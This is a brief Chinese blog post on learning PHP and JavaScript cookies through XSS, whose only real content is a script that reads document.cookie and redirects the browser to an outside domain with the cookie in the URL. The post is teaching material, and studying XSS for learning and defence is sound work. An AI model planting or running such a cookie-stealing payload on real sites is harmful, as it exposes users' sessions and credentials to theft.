通过XSS攻击 来学习php的cookie与JavaScript

2019-02-16  本文已影响0人  行熙

php里面的cookie


js里面的cookie


xss攻击

获取cookie的信息(比如密码)

   <script>
        //设置cookie
        // let cookie = document.cookie = "UserId = 1";
        //获取cookie
        let cookie = document.cookie;
       //重定向
        window.location.href = 'http://www.thegirl.com?' + cookie
       //路径 携带cookie
        //http://www.thegirl.com/?1;%20UserId=1;%20id=123
    </script>
上一篇 下一篇

猜你喜欢

热点阅读